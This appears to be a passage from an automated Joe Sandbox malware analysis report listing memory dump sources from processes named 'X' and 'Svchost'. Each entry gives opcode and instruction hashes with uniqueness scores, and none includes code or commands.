                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0097c3760f06c1867cc61c3e86e4bb7e182e09cfca6fc910984c66839cc116e2
                                                                                                                                                                                                          • Instruction ID: dccdb17f742b73dd1658044dd2b9c000baf4b49c4a9a79706eeef9158cd2b36f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0097c3760f06c1867cc61c3e86e4bb7e182e09cfca6fc910984c66839cc116e2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96115E30759919AFEBD5FB6CC4E59A937E1FB59705B4005AAE008C3352DF35AC828F80
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b46e938e8a8ea781924dc34a6e0a7a97b962b99d60e1833e8a05e391f1c74ff9
                                                                                                                                                                                                          • Instruction ID: 3c782f42ee4dfb6a54fcf8d5cd999793e9cc32dfdbf3a70761825c0a557f5052
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b46e938e8a8ea781924dc34a6e0a7a97b962b99d60e1833e8a05e391f1c74ff9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64119020B1891A6FE754BBEC94B27BA76D5EB49300F640179E00DC32C3DD68B80087D2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c22be2db02535a64bcdd4d08a4ed5295a10dc41e5f6d89c956519b5314d7fff1
                                                                                                                                                                                                          • Instruction ID: 289287c24b87267b99c23973da9f3fc78c45e3ed4fabd4ae7e3cccc58d1a7446
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c22be2db02535a64bcdd4d08a4ed5295a10dc41e5f6d89c956519b5314d7fff1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E71127A2F1D9494FEB948B5840E827977D1EF9A314F44457ED08ED32A1CEB86842C6C0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a0ca61221df63d4195422d6b37d092ebcacd48ace5330e78516aac916b7604db
                                                                                                                                                                                                          • Instruction ID: 0ef024382ca4595becf9895f0733939b92b86fc458951976c83bd2b48ce84c5e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0ca61221df63d4195422d6b37d092ebcacd48ace5330e78516aac916b7604db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5601C422B0C96E0FEB90FB6C94A56ED77E0FF9A311B0801B6E50DC3152DE18690247C1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 95f0a1ec7992539a314dc3114e2f7fd55164b485ef7814e6622118d524dd9246
                                                                                                                                                                                                          • Instruction ID: 770af3ddeecbe7a7d9a3ce5071b349e8109dd79011cfa04656a07e4bcbecc30e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95f0a1ec7992539a314dc3114e2f7fd55164b485ef7814e6622118d524dd9246
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C111E1B1A88A4E4FD788DF7C94F92B93FE1EB99201F4444BFD04AD32A1CE7510408B80
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 65af1c41f3a53bec48cfc9314f1468b39aef48a0868f55847c3c0530446c55ec
                                                                                                                                                                                                          • Instruction ID: 8e0429981d39f975f8af34305dd3b6afa803b36e16a5254e43a6d2bd2c250c2d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65af1c41f3a53bec48cfc9314f1468b39aef48a0868f55847c3c0530446c55ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201F132F0995D4FEB45EBA888690FD7BB1FF59201F0002BBE459C3182DE6859008791
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 35783cf548aac47a4ba0070ca866d8c7645e837052ba78964d9be20f0f961634
                                                                                                                                                                                                          • Instruction ID: 5bb8ad772256a517b2c7b1ec0d2030119f9440f4ac35c228376eb27b4ec042cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35783cf548aac47a4ba0070ca866d8c7645e837052ba78964d9be20f0f961634
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1901F932B19D1C5FF7A0E72C94A66ED37E2FB99710F000176E009D3242DD2878424BC1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3478565b18ed503f4c5cc5f948f45b48664216662bcd959326a45945d3128da5
                                                                                                                                                                                                          • Instruction ID: ed0f73c06422abaf194e7d8cf8eef0de53ddb2036a822e84d1b4f987f5326b9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3478565b18ed503f4c5cc5f948f45b48664216662bcd959326a45945d3128da5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3014215A0C7C10FE752AB3858B55767FE19F87240B4805BAD889CB0EBDC08A9898382
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 476825a34654ba3c6c3774dde6ba3184a77a87422e29c23f27d50ddb8a967fe1
                                                                                                                                                                                                          • Instruction ID: bae9cf45ff7bc4eb2bd882d04947cc0efb54ed0d11835a3123d6de1428c3d27c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476825a34654ba3c6c3774dde6ba3184a77a87422e29c23f27d50ddb8a967fe1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F08731F0592D4FEB54FBA898591FEB7F1FB58202F0002BBE409D2295DE74694087C1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3d000268636302a69e7f2396217a281dace86d6a0bf8da29454c3576394b7245
                                                                                                                                                                                                          • Instruction ID: 12d67de28bc76645b0c24abf0f39e2baf617bc8498ef0f60914d4b686f722b44
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d000268636302a69e7f2396217a281dace86d6a0bf8da29454c3576394b7245
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F03A2184E3C95FD7035B745C355A57FB4AE53200B0D41DBE888CB0A7DA1C6519D3A3
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b7ffe23bde743589b7e18c27b3cd2953f3246f46a5ee02571f08767157fbc820
                                                                                                                                                                                                          • Instruction ID: d7f49feee27cceafc6545c24d31c27a88d4a50ea4b25d4abbbe553743c6687ea
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7ffe23bde743589b7e18c27b3cd2953f3246f46a5ee02571f08767157fbc820
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E0203190CE4C4FDF41AB59D8546E97BA0FF8E31CF0800BBE55CD3281CA655555C355
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b169cb9915f990253efc24a2eefe72b4e22d4f5ef1226921eb50dfed5b2ba4c8
                                                                                                                                                                                                          • Instruction ID: 0a15098b094bc5741e84168c5968c53b4247e371b64cb6fceaba2e80bde30b99
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b169cb9915f990253efc24a2eefe72b4e22d4f5ef1226921eb50dfed5b2ba4c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D01259F6810307E715777554721BE20C75FC5624B595878E10EDB697DD7CE8021280
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 72f1af45c68aab79ef97c6db834e5204a170bb11e9f2d8f64390c6fedc3685b4
                                                                                                                                                                                                          • Instruction ID: 35fc8a6dca1183e2b0064a9938bd91a6c497288dbe9a3b127bb4c39812f36eac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72f1af45c68aab79ef97c6db834e5204a170bb11e9f2d8f64390c6fedc3685b4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93B09200F6E84A089419337949E20ADBB20AB8B220FC408B0D98980082DD8E549662C2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: dc0f3855ac096781c517240ec80ffe0f3b67b8b0c8be0dc5ce8c4ade84c9919d
                                                                                                                                                                                                          • Instruction ID: 59fd2410b8d808d5bc21df18805c5ce6e1227ea320ece4f87e5de44763b082f2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc0f3855ac096781c517240ec80ffe0f3b67b8b0c8be0dc5ce8c4ade84c9919d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31A00204D9B80F05984832BA1DD70ED74506B8B114FC55160E91CD498AECCE15E912E3
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7d32e6d39b9cb50ffd0012e1936b6873a9571b61e77000e12bfe60626f6c59a5
                                                                                                                                                                                                          • Instruction ID: ba92e6b55abfc697f60dbb7f1de2d16e95e167b9d4a33b41dfa88546934968af
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d32e6d39b9cb50ffd0012e1936b6873a9571b61e77000e12bfe60626f6c59a5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00328261B28E494BE7A8EBAC84B667977D2FF99700F540579E40ED32D2DE3CAC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 289fdfb21b27abb381156d1d7de48e311d5b99b28f63b8fa06de2114ca5dc32d
                                                                                                                                                                                                          • Instruction ID: 88d1de7989c5a5c29b2decf09055f76ec7a14fd13c5559811511f4feb46a1682
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 289fdfb21b27abb381156d1d7de48e311d5b99b28f63b8fa06de2114ca5dc32d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7227361B1CE594BE7A8EBA884B56B976D2EF99300F540579E40ED32D2DE3CAC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: facb77852ec633ac5325c3c5eee460047cc2730ddda8d7b2119b0b46f1abec40
                                                                                                                                                                                                          • Instruction ID: 9bca92c82026c0dc1d53182910203199a1e1b5e59a38085ecf90d71edae2adb7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: facb77852ec633ac5325c3c5eee460047cc2730ddda8d7b2119b0b46f1abec40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B251FF10B1EAC90FE796A77858B52B9BFD5DF87216B0804FEE08DC72A3DD585806D342
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bcfe7189b1cde708c21d5e48f91eb9cafd8ba1e956d5e2762684ed219ffb0ff9
                                                                                                                                                                                                          • Instruction ID: 2270253e904d7abd36ceac2e86ec8647f71836c3e5abcc39f888a4e6c6b6aa2a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcfe7189b1cde708c21d5e48f91eb9cafd8ba1e956d5e2762684ed219ffb0ff9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD712721B1DA8A0FE795E76C88652B97BE2EF87221B0801BED44DD7293DD6C6C468350
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2f76533cbecbf5e76ab5dd50d9dbeff9ad4cb8fff9b1104646f4a00d49b05f98
                                                                                                                                                                                                          • Instruction ID: 0c982689c1f985c99c0787ec68f1d8eba1739fd5b3763cc10d6ceff521d3b922
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f76533cbecbf5e76ab5dd50d9dbeff9ad4cb8fff9b1104646f4a00d49b05f98
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4319321B1D9490FF798FB6C946A279A6C2EF99311F0405BEE04EC7293DD68AC429341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 860907a1374436a2d28c1afd68fbb8b72077a0f387f2e33489f6ecbfa84c2ca6
                                                                                                                                                                                                          • Instruction ID: 404b271a67e65ac9ec4a0d51c8815fc5c15b84143af440dbe982aab34de7b40b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 860907a1374436a2d28c1afd68fbb8b72077a0f387f2e33489f6ecbfa84c2ca6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21319421B18D095FEB54BBEC58693BD77D5EF99311F1401BAE40DC32D2DE2868418791
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2eeda2d93796d6d3749d870a593fa8ac442164dc2c8f41f7eb4b7f789cb54228
                                                                                                                                                                                                          • Instruction ID: 20967bd61556bd9769cc214c45435d92420bbf7c2995dc643d6714c858256434
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eeda2d93796d6d3749d870a593fa8ac442164dc2c8f41f7eb4b7f789cb54228
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95318B74B18A0A8FEB44EBA8C4B56B97BF1FF9A300F540579D009E3296DE3C68468750
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 64226ee4f4f1d75a92de9ada78bcc28fb1606dd38b260fc24f8def9f60e22dac
                                                                                                                                                                                                          • Instruction ID: af979f858140c5aa130ccba440e69aa4e5d95227caa431863f9ab499211340ab
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64226ee4f4f1d75a92de9ada78bcc28fb1606dd38b260fc24f8def9f60e22dac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C014219A0CB810FF742A73858B15767FE19F93200B4805BAD88DC70E7ED0CAA818382
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3171d82bdafc3e9fd859a6d3b749d55238d3b9b6d7f74f330f511e726e6cc587
                                                                                                                                                                                                          • Instruction ID: 84ee700cbd9bc95bcaa0a7f4d03759e8af97aab0c4c4ca506bd95ee6153d84f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3171d82bdafc3e9fd859a6d3b749d55238d3b9b6d7f74f330f511e726e6cc587
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1632B620B29A494BE798EBBC84B5679B7D2FF99311F580579E40ED32C2DE78AC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 12aa2f9bc69cfa2b9a08df8fd157b269148351442b358fee45670cf4edb656e7
                                                                                                                                                                                                          • Instruction ID: 6726df2551fb5d67b6db8978ffd372566007b3a027b0603278e7ada19fb77a13
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12aa2f9bc69cfa2b9a08df8fd157b269148351442b358fee45670cf4edb656e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F922B620B1AA494FE7A8EB7C84B56B977D2FF89311F480579E40EC32C2DE78AC018351
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e7f629f374f01b77b313d5987ea7b9899e2836f5f8d9e96509475563cf5b337c
                                                                                                                                                                                                          • Instruction ID: 63cdcfa1677e88a385fcb142c3b3a559d80245bbf8e64dbcb18f9cc5bc322b6a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7f629f374f01b77b313d5987ea7b9899e2836f5f8d9e96509475563cf5b337c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75512010B0E6C90FE796AB7858B5279BFD5DF87216B0804FEE08DC72A3DD585806C352
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 95e8cd8dcc00ab90fce66ae62413496b3850a2b30d3a2ee200020102067a0c56
                                                                                                                                                                                                          • Instruction ID: f431f9806ed97aedc9e1d48ba6becaa7b1a2ab8075b66a307a220058b035a708
